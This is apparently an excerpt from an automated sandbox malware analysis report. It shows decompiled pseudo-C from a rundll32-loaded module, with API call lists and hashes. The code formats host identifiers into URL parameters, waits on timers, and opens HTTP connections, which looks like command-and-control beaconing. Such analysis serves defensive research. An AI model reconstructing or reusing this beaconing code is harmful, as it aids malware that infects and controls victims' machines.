                    					_t92 =  *0x444a320; // 0xafd5a8
                    					_t8 = _t92 + 0x444b67e; // 0x732526
                    					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t95; // executed
                    				}
                    				_t42 = E0444256F(_t99); // executed
                    				_t104 = _t42;
                    				if(_t104 != 0) {
                    					_t87 =  *0x444a320; // 0xafd5a8
                    					_t10 = _t87 + 0x444b8d4; // 0x736e6426
                    					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t90;
                    					HeapFree( *0x444a2d8, 0, _t104);
                    				}
                    				_t105 = E04444B71();
                    				if(_t105 != 0) {
                    					_t82 =  *0x444a320; // 0xafd5a8
                    					_t12 = _t82 + 0x444b8dc; // 0x6f687726
                    					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t85;
                    					HeapFree( *0x444a2d8, 0, _t105);
                    				}
                    				_t106 =  *0x444a3cc; // 0x4f495b0
                    				_a24 = E04447729(0x444a00a, _t106 + 4);
                    				_t46 =  *0x444a36c; // 0x0
                    				if(_t46 != 0) {
                    					_t78 =  *0x444a320; // 0xafd5a8
                    					_t15 = _t78 + 0x444b8b6; // 0x3d736f26
                    					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
                    					_t116 = _t116 + 0xc;
                    					_t110 = _t110 + _t81;
                    				}
                    				_t47 =  *0x444a368; // 0x0
                    				if(_t47 != 0) {
                    					_t75 =  *0x444a320; // 0xafd5a8
                    					_t17 = _t75 + 0x444b88d; // 0x3d706926
                    					wsprintfA(_t110 + _t113, _t17, _t47);
                    				}
                    				if(_a24 != 0) {
                    					_t108 = RtlAllocateHeap( *0x444a2d8, 0, 0x800);
                    					if(_t108 != 0) {
                    						E044453EC(GetTickCount());
                    						_t54 =  *0x444a3cc; // 0x4f495b0
                    						__imp__(_t54 + 0x40);
                    						asm("lock xadd [eax], ecx");
                    						_t58 =  *0x444a3cc; // 0x4f495b0
                    						__imp__(_t58 + 0x40);
                    						_t60 =  *0x444a3cc; // 0x4f495b0
                    						_t61 = E044418BA(1, _t103, _t113,  *_t60); // executed
                    						_t111 = _t61;
                    						asm("lock xadd [eax], ecx");
                    						if(_t111 != 0) {
                    							StrTrimA(_t111, 0x444928c);
                    							_push(_t111);
                    							_t66 = E0444252A();
                    							_a12 = _t66;
                    							if(_t66 != 0) {
                    								_t97 = __imp__;
                    								 *_t97(_t111, _v0);
                    								 *_t97(_t108, _v4);
                    								_t98 = __imp__;
                    								 *_t98(_t108, _v0);
                    								 *_t98(_t108, _t111);
                    								_t72 = E04441AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
                    								_v52 = _t72;
                    								if(_t72 != 0 && _t72 != 0x10d2) {
                    									E04445F6A();
                    								}
                    								HeapFree( *0x444a2d8, 0, _v16);
                    							}
                    							HeapFree( *0x444a2d8, 0, _t111);
                    						}
                    						RtlFreeHeap( *0x444a2d8, 0, _t108); // executed
                    					}
                    					HeapFree( *0x444a2d8, 0, _a16);
                    				}
                    				HeapFree( *0x444a2d8, 0, _t113);
                    				return _a12;
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04446901
                    • wsprintfA.USER32 ref: 0444694E
                    • wsprintfA.USER32 ref: 0444696B
                    • wsprintfA.USER32 ref: 0444698D
                    • wsprintfA.USER32 ref: 044469B0
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044469C0
                    • wsprintfA.USER32 ref: 044469E2
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044469F2
                    • wsprintfA.USER32 ref: 04446A29
                    • wsprintfA.USER32 ref: 04446A49
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04446A66
                    • GetTickCount.KERNEL32 ref: 04446A76
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04446A8A
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04446AA8
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044418BA: strcpy.NTDLL ref: 04441904
                      • Part of subcall function 044418BA: lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 044418BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                    • StrTrimA.SHLWAPI(00000000,0444928C,?,04F495B0), ref: 04446ADA
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 0444252A: lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                      • Part of subcall function 0444252A: lstrcat.KERNEL32(00000000,?), ref: 04442561
                    • lstrcpy.KERNEL32(00000000,?), ref: 04446AF9
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 04446B00
                    • lstrcat.KERNEL32(00000000,?), ref: 04446B0D
                    • lstrcat.KERNEL32(00000000,00000000), ref: 04446B11
                      • Part of subcall function 04441AA2: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 04441B54
                    • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04446B41
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04446B50
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04F495B0), ref: 04446B5F
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04446B71
                    • HeapFree.KERNEL32(00000000,?), ref: 04446B80
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                    • String ID: Ut
                    • API String ID: 1892477351-8415677
                    • Opcode ID: af9bb003dd70fbdcad03a56a9aa8502db1d61e3e9a4c016015279d49844f0af6
                    • Instruction ID: 9fb2106a23296e76cdc7ef268feb4c0bfeb129a3fa7198f81923b0229a52eb55
                    • Opcode Fuzzy Hash: af9bb003dd70fbdcad03a56a9aa8502db1d61e3e9a4c016015279d49844f0af6
                    • Instruction Fuzzy Hash: BD71897A540200AFFB119B64EC48E5777E8FBC9314F050529F948E3251EB3DEC15AB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 75%
                    			E04442FC4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                    				signed int _v8;
                    				void* _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				void* __ebx;
                    				void* __edi;
                    				long _t63;
                    				intOrPtr _t64;
                    				intOrPtr _t65;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				intOrPtr _t68;
                    				void* _t71;
                    				intOrPtr _t72;
                    				int _t75;
                    				void* _t76;
                    				void* _t77;
                    				void* _t79;
                    				void* _t82;
                    				intOrPtr _t86;
                    				intOrPtr _t90;
                    				intOrPtr* _t92;
                    				void* _t93;
                    				void* _t98;
                    				intOrPtr _t104;
                    				signed int _t108;
                    				char** _t110;
                    				int _t113;
                    				signed int _t115;
                    				intOrPtr* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr* _t120;
                    				intOrPtr* _t122;
                    				intOrPtr _t125;
                    				intOrPtr _t130;
                    				int _t134;
                    				intOrPtr _t136;
                    				int _t139;
                    				CHAR* _t140;
                    				intOrPtr _t141;
                    				void* _t142;
                    				void* _t151;
                    				int _t152;
                    				void* _t153;
                    				intOrPtr _t154;
                    				void* _t156;
                    				long _t160;
                    				intOrPtr* _t161;
                    				intOrPtr* _t162;
                    				intOrPtr* _t165;
                    				void* _t166;
                    				void* _t168;
                    
                    				_t151 = __edx;
                    				_t142 = __ecx;
                    				_t63 = __eax;
                    				_v8 = 8;
                    				if(__eax == 0) {
                    					_t63 = GetTickCount();
                    				}
                    				_t64 =  *0x444a018; // 0x3639fe1b
                    				asm("bswap eax");
                    				_t65 =  *0x444a014; // 0x3a87c8cd
                    				_t140 = _a20;
                    				asm("bswap eax");
                    				_t66 =  *0x444a010; // 0xd8d2f808
                    				asm("bswap eax");
                    				_t67 =  *0x444a00c; // 0xeec43f25
                    				asm("bswap eax");
                    				_t68 =  *0x444a320; // 0xafd5a8
                    				_t3 = _t68 + 0x444b633; // 0x74666f73
                    				_t152 = wsprintfA(_t140, _t3, 3, 0x3d170, _t67, _t66, _t65, _t64,  *0x444a02c,  *0x444a004, _t63);
                    				_t71 = E04444B2C();
                    				_t72 =  *0x444a320; // 0xafd5a8
                    				_t4 = _t72 + 0x444b673; // 0x74707526
                    				_t75 = wsprintfA(_t152 + _t140, _t4, _t71);
                    				_t168 = _t166 + 0x38;
                    				_t153 = _t152 + _t75;
                    				if(_a8 != 0) {
                    					_t136 =  *0x444a320; // 0xafd5a8
                    					_t8 = _t136 + 0x444b67e; // 0x732526
                    					_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t139; // executed
                    				}
                    				_t76 = E0444256F(_t142); // executed
                    				_t141 = __imp__; // 0x74e05520
                    				_a8 = _t76;
                    				if(_t76 != 0) {
                    					_t130 =  *0x444a320; // 0xafd5a8
                    					_t11 = _t130 + 0x444b8d4; // 0x736e6426
                    					_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                    					_t168 = _t168 + 0xc;
                    					_t153 = _t153 + _t134;
                    					HeapFree( *0x444a2d8, 0, _a8);
                    				}
                    				_t77 = E04444B71();
                    				_a8 = _t77;
                    				if(_t77 != 0) {
                    					_t125 =  *0x444a320; // 0xafd5a8
                    					_t15 = _t125 + 0x444b8dc; // 0x6f687726
                    					wsprintfA(_t153 + _a20, _t15, _t77);
                    					_t168 = _t168 + 0xc;
                    					HeapFree( *0x444a2d8, 0, _a8);
                    				}
                    				_t154 =  *0x444a3cc; // 0x4f495b0
                    				_t79 = E04447729(0x444a00a, _t154 + 4);
                    				_t160 = 0;
                    				_v16 = _t79;
                    				if(_t79 == 0) {
                    					L28:
                    					RtlFreeHeap( *0x444a2d8, _t160, _a20); // executed
                    					return _v8;
                    				} else {
                    					_t82 = RtlAllocateHeap( *0x444a2d8, 0, 0x800); // executed
                    					_a8 = _t82;
                    					if(_t82 == 0) {
                    						L27:
                    						HeapFree( *0x444a2d8, _t160, _v16);
                    						goto L28;
                    					}
                    					E044453EC(GetTickCount());
                    					_t86 =  *0x444a3cc; // 0x4f495b0
                    					__imp__(_t86 + 0x40);
                    					asm("lock xadd [eax], ecx");
                    					_t90 =  *0x444a3cc; // 0x4f495b0
                    					__imp__(_t90 + 0x40);
                    					_t92 =  *0x444a3cc; // 0x4f495b0
                    					_t93 = E044418BA(1, _t151, _a20,  *_t92); // executed
                    					_t156 = _t93;
                    					_v24 = _t156;
                    					asm("lock xadd [eax], ecx");
                    					if(_t156 == 0) {
                    						L26:
                    						RtlFreeHeap( *0x444a2d8, _t160, _a8); // executed
                    						goto L27;
                    					}
                    					StrTrimA(_t156, 0x444928c);
                    					_push(_t156);
                    					_t98 = E0444252A();
                    					_v12 = _t98;
                    					if(_t98 == 0) {
                    						L25:
                    						HeapFree( *0x444a2d8, _t160, _t156);
                    						goto L26;
                    					}
                    					_t161 = __imp__;
                    					 *_t161(_t156, _a4);
                    					 *_t161(_a8, _v16);
                    					_t162 = __imp__;
                    					 *_t162(_a8, _v12);
                    					_t104 = E04445406( *_t162(_a8, _t156), _a8);
                    					_a4 = _t104;
                    					if(_t104 == 0) {
                    						_v8 = 8;
                    						L23:
                    						E04445F6A();
                    						L24:
                    						HeapFree( *0x444a2d8, 0, _v12);
                    						_t160 = 0;
                    						goto L25;
                    					}
                    					_t108 = E044422C7(_t141, 0xffffffffffffffff, _t156,  &_v20); // executed
                    					_v8 = _t108;
                    					if(_t108 == 0) {
                    						_t165 = _v20;
                    						_t115 = E04441E51(_t165, _a4, _a12, _a16); // executed
                    						_v8 = _t115;
                    						_t116 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                    						_t118 =  *((intOrPtr*)(_t165 + 8));
                    						 *((intOrPtr*)( *_t118 + 8))(_t118);
                    						_t120 =  *((intOrPtr*)(_t165 + 4));
                    						 *((intOrPtr*)( *_t120 + 8))(_t120);
                    						_t122 =  *_t165;
                    						 *((intOrPtr*)( *_t122 + 8))(_t122);
                    						E044417AB(_t165);
                    					}
                    					if(_v8 != 0x10d2) {
                    						L18:
                    						if(_v8 == 0) {
                    							_t110 = _a12;
                    							if(_t110 != 0) {
                    								_t157 =  *_t110;
                    								_t163 =  *_a16;
                    								wcstombs( *_t110,  *_t110,  *_a16);
                    								_t113 = E04445D6F(_t157, _t157, _t163 >> 1);
                    								_t156 = _v24;
                    								 *_a16 = _t113;
                    							}
                    						}
                    						goto L21;
                    					} else {
                    						if(_a12 != 0) {
                    							L21:
                    							E044417AB(_a4);
                    							if(_v8 == 0 || _v8 == 0x10d2) {
                    								goto L24;
                    							} else {
                    								goto L23;
                    							}
                    						}
                    						_v8 = _v8 & 0x00000000;
                    						goto L18;
                    					}
                    				}
                    			}

                    APIs
                    • GetTickCount.KERNEL32 ref: 04442FD8
                    • wsprintfA.USER32 ref: 04443028
                    • wsprintfA.USER32 ref: 04443045
                    • wsprintfA.USER32 ref: 04443065
                    • wsprintfA.USER32 ref: 04443091
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044430A3
                    • wsprintfA.USER32 ref: 044430C4
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044430D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443102
                    • GetTickCount.KERNEL32 ref: 04443113
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04443127
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04443145
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                      • Part of subcall function 044418BA: lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044418BA: strcpy.NTDLL ref: 04441904
                      • Part of subcall function 044418BA: lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 044418BA: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                    • StrTrimA.SHLWAPI(00000000,0444928C,?,04F495B0), ref: 0444317C
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(04F49B50,00000000,00000000,7691C740,04446AE6,00000000), ref: 0444253A
                      • Part of subcall function 0444252A: lstrlen.KERNEL32(?), ref: 04442542
                      • Part of subcall function 0444252A: lstrcpy.KERNEL32(00000000,04F49B50), ref: 04442556
                      • Part of subcall function 0444252A: lstrcat.KERNEL32(00000000,?), ref: 04442561
                    • lstrcpy.KERNEL32(00000000,?), ref: 0444319D
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 044431A5
                    • lstrcat.KERNEL32(00000000,?), ref: 044431B3
                    • lstrcat.KERNEL32(00000000,00000000), ref: 044431B9
                      • Part of subcall function 04445406: lstrlen.KERNEL32(?,00000000,04F49D58,00000000,04443C77,04F49F7B,69B25F44,?,?,?,?,69B25F44,00000005,0444A00C,4D283A53,?), ref: 0444540D
                      • Part of subcall function 04445406: mbstowcs.NTDLL ref: 04445436
                      • Part of subcall function 04445406: memset.NTDLL ref: 04445448
                    • wcstombs.NTDLL ref: 0444324A
                      • Part of subcall function 04441E51: SysAllocString.OLEAUT32(?), ref: 04441E92
                      • Part of subcall function 04441E51: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04441F14
                      • Part of subcall function 04441E51: StrStrIW.SHLWAPI(?,006E0069), ref: 04441F53
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0444328B
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04443297
                    • RtlFreeHeap.NTDLL(00000000,00000000,?,04F495B0), ref: 044432A3
                    • HeapFree.KERNEL32(00000000,00000000), ref: 044432AF
                    • RtlFreeHeap.NTDLL(00000000,?), ref: 044432BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                    • String ID: Ut
                    • API String ID: 3111183435-8415677
                    • Opcode ID: 25fc54cb25d452454269ff4733467471a196aa9cf39fb89aaed4b2dacf566635
                    • Instruction ID: 36d0a0304220bf7d9ec032b5427fa54285adc06af9ecec5d05bc5cbe1c14e1fb
                    • Opcode Fuzzy Hash: 25fc54cb25d452454269ff4733467471a196aa9cf39fb89aaed4b2dacf566635
                    • Instruction Fuzzy Hash: CE914B75A00208AFEF11DFA5DC48A9ABBB9FF88754F148016F808E7251DB35ED51DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 102 4445458-444548a memset CreateWaitableTimerA 103 4445490-44454e9 _allmul SetWaitableTimer WaitForMultipleObjects 102->103 104 444560b-4445611 GetLastError 102->104 106 4445573-4445579 103->106 107 44454ef-44454f2 103->107 105 4445615-444561f 104->105 108 444557a-444557e 106->108 109 44454f4 call 4443399 107->109 110 44454fd 107->110 111 4445580-4445582 108->111 112 444558e-4445592 108->112 115 44454f9-44454fb 109->115 114 4445507 110->114 111->112 112->108 116 4445594-444559e CloseHandle 112->116 117 444550b-4445510 114->117 115->110 115->114 116->105 118 4445512-4445519 117->118 119 4445523-4445550 call 4443a12 117->119 118->119 120 444551b 118->120 123 44455a0-44455a5 119->123 124 4445552-444555d 119->124 120->119 126 44455c4-44455cc 123->126 127 44455a7-44455ad 123->127 124->117 125 444555f-444556f call 44417c0 124->125 125->106 128 44455d2-4445600 _allmul SetWaitableTimer WaitForMultipleObjects 126->128 127->106 130 44455af-44455c2 call 4445f6a 127->130 128->117 131 4445606 128->131 130->128 131->106
                    C-Code - Quality: 83%
                    			E04445458(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				void _v48;
                    				long _v52;
                    				struct %anon52 _v60;
                    				char _v72;
                    				long _v76;
                    				void* _v80;
                    				union _LARGE_INTEGER _v84;
                    				struct %anon52 _v92;
                    				void* _v96;
                    				void* _v100;
                    				union _LARGE_INTEGER _v104;
                    				long _v108;
                    				struct %anon52 _v124;
                    				long _v128;
                    				struct %anon52 _t46;
                    				void* _t51;
                    				long _t53;
                    				void* _t54;
                    				struct %anon52 _t61;
                    				long _t65;
                    				struct %anon52 _t66;
                    				void* _t69;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t76;
                    				void* _t78;
                    				void** _t82;
                    				signed int _t86;
                    				void* _t89;
                    
                    				_t76 = __edx;
                    				_v52 = 0;
                    				memset( &_v48, 0, 0x2c);
                    				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                    				_t46 = CreateWaitableTimerA(0, 1, 0);
                    				_v60 = _t46;
                    				if(_t46 == 0) {
                    					_v92.HighPart = GetLastError();
                    				} else {
                    					_push(0xffffffff);
                    					_push(0xff676980);
                    					_push(0);
                    					_push( *0x444a2e0);
                    					_v76 = 0;
                    					_v80 = 0;
                    					L0444818A();
                    					_v84.LowPart = _t46;
                    					_v80 = _t76;
                    					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                    					_t51 =  *0x444a30c; // 0x2e4
                    					_v76 = _t51;
                    					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                    					_v108 = _t53;
                    					if(_t53 == 0) {
                    						if(_a8 != 0) {
                    							L4:
                    							 *0x444a2ec = 5;
                    						} else {
                    							_t69 = E04443399(_t76); // executed
                    							if(_t69 != 0) {
                    								goto L4;
                    							}
                    						}
                    						_v104.LowPart = 0;
                    						L6:
                    						L6:
                    						if(_v104.LowPart == 1 && ( *0x444a300 & 0x00000001) == 0) {
                    							_v104.LowPart = 2;
                    						}
                    						_t74 = _v104.LowPart;
                    						_t58 = _t74 << 4;
                    						_t78 = _t89 + (_t74 << 4) + 0x38;
                    						_t75 = _t74 + 1;
                    						_v92.LowPart = _t74 + 1;
                    						_t61 = E04443A12( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                    						_v124 = _t61;
                    						if(_t61 != 0) {
                    							goto L17;
                    						}
                    						_t66 = _v92;
                    						_t97 = _t66 - 3;
                    						_v104.LowPart = _t66;
                    						if(_t66 != 3) {
                    							goto L6;
                    						} else {
                    							_v124.HighPart = E044417C0(_t75, _t97,  &_v72, _a4, _a8);
                    						}
                    						goto L12;
                    						L17:
                    						__eflags = _t61 - 0x10d2;
                    						if(_t61 != 0x10d2) {
                    							_push(0xffffffff);
                    							_push(0xff676980);
                    							_push(0);
                    							_push( *0x444a2e4);
                    							goto L21;
                    						} else {
                    							__eflags =  *0x444a2e8; // 0x0
                    							if(__eflags == 0) {
                    								goto L12;
                    							} else {
                    								_t61 = E04445F6A();
                    								_push(0xffffffff);
                    								_push(0xdc3cba00);
                    								_push(0);
                    								_push( *0x444a2e8);
                    								L21:
                    								L0444818A();
                    								_v104.LowPart = _t61;
                    								_v100 = _t78;
                    								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                    								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                    								__eflags = _t65;
                    								_v128 = _t65;
                    								if(_t65 == 0) {
                    									goto L6;
                    								} else {
                    									goto L12;
                    								}
                    							}
                    						}
                    						L25:
                    					}
                    					L12:
                    					_t82 =  &_v72;
                    					_t73 = 3;
                    					do {
                    						_t54 =  *_t82;
                    						if(_t54 != 0) {
                    							HeapFree( *0x444a2d8, 0, _t54);
                    						}
                    						_t82 =  &(_t82[4]);
                    						_t73 = _t73 - 1;
                    					} while (_t73 != 0);
                    					CloseHandle(_v80);
                    				}
                    				return _v92.HighPart;
                    				goto L25;
                    			}

                    APIs
                    • memset.NTDLL ref: 04445472
                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0444547E
                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 044454A6
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 044454C6
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,044466F1,?), ref: 044454E1
                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000), ref: 04445588
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000,?,?), ref: 04445598
                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044455D2
                    • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 044455EC
                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044455F8
                      • Part of subcall function 04443399: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F493D8,00000000,?,74E5F710,00000000,74E5F730), ref: 044433E8
                      • Part of subcall function 04443399: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F49410,?,00000000,30314549,00000014,004F0053,04F493CC), ref: 04443485
                      • Part of subcall function 04443399: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044454F9), ref: 04443497
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044466F1,?,00000000,?,?), ref: 0444560B
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                    • String ID: Ut
                    • API String ID: 3521023985-8415677
                    • Opcode ID: f20d1c06fd3712e930cd2ecf488b25712623e2f511adf7c039e3e9b1fc5651a9
                    • Instruction ID: c403773d51c597f7c489b734cef123c08fab9e91a3ec630294b8073803f70ea7
                    • Opcode Fuzzy Hash: f20d1c06fd3712e930cd2ecf488b25712623e2f511adf7c039e3e9b1fc5651a9
                    • Instruction Fuzzy Hash: 36517AB5508320BFFF109F15DC449ABBBE9EBC4764F104A1AF5A492290D774E944CFA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E04447A34(void* __eax, void* __ecx, long __esi, char* _a4) {
                    				void _v8;
                    				long _v12;
                    				void _v16;
                    				void* _t34;
                    				void* _t38;
                    				void* _t40;
                    				int _t53;
                    				char* _t56;
                    				long _t57;
                    				void* _t58;
                    				intOrPtr _t59;
                    				long _t65;
                    
                    				_t65 = __esi;
                    				_t58 = __ecx;
                    				_v16 = 0xea60;
                    				__imp__( *(__esi + 4));
                    				_v12 = __eax + __eax;
                    				_t56 = E044463FD(__eax + __eax + 1);
                    				if(_t56 != 0) {
                    					_t53 = InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0); // executed
                    					if(_t53 == 0) {
                    						E044417AB(_t56);
                    					} else {
                    						E044417AB( *(__esi + 4));
                    						 *(__esi + 4) = _t56;
                    					}
                    				}
                    				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                    				 *(_t65 + 0x10) = _t34;
                    				if(_t34 == 0 || InternetSetStatusCallback(_t34, E044479C9) == 0xffffffff) {
                    					L15:
                    					return GetLastError();
                    				} else {
                    					ResetEvent( *(_t65 + 0x1c));
                    					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                    					 *(_t65 + 0x14) = _t38;
                    					if(_t38 != 0 || GetLastError() == 0x3e5 && E04445867( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                    						_t59 =  *0x444a320; // 0xafd5a8
                    						_t15 = _t59 + 0x444b743; // 0x544547
                    						_v8 = 0x84404000;
                    						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65);
                    						 *(_t65 + 0x18) = _t40;
                    						if(_t40 == 0) {
                    							goto L15;
                    						}
                    						_t57 = 4;
                    						_v12 = _t57;
                    						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                    							_v8 = _v8 | 0x00000100;
                    							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                    						}
                    						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                    							goto L15;
                    						} else {
                    							return 0;
                    						}
                    					} else {
                    						goto L15;
                    					}
                    				}
                    			}

                    APIs
                    • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 04447A46
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04447A69
                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04447A91
                    • InternetSetStatusCallback.WININET(00000000,044479C9), ref: 04447AA8
                    • ResetEvent.KERNEL32(?), ref: 04447ABA
                    • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04447ACD
                    • GetLastError.KERNEL32 ref: 04447ADA
                    • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04447B20
                    • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04447B3E
                    • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04447B5F
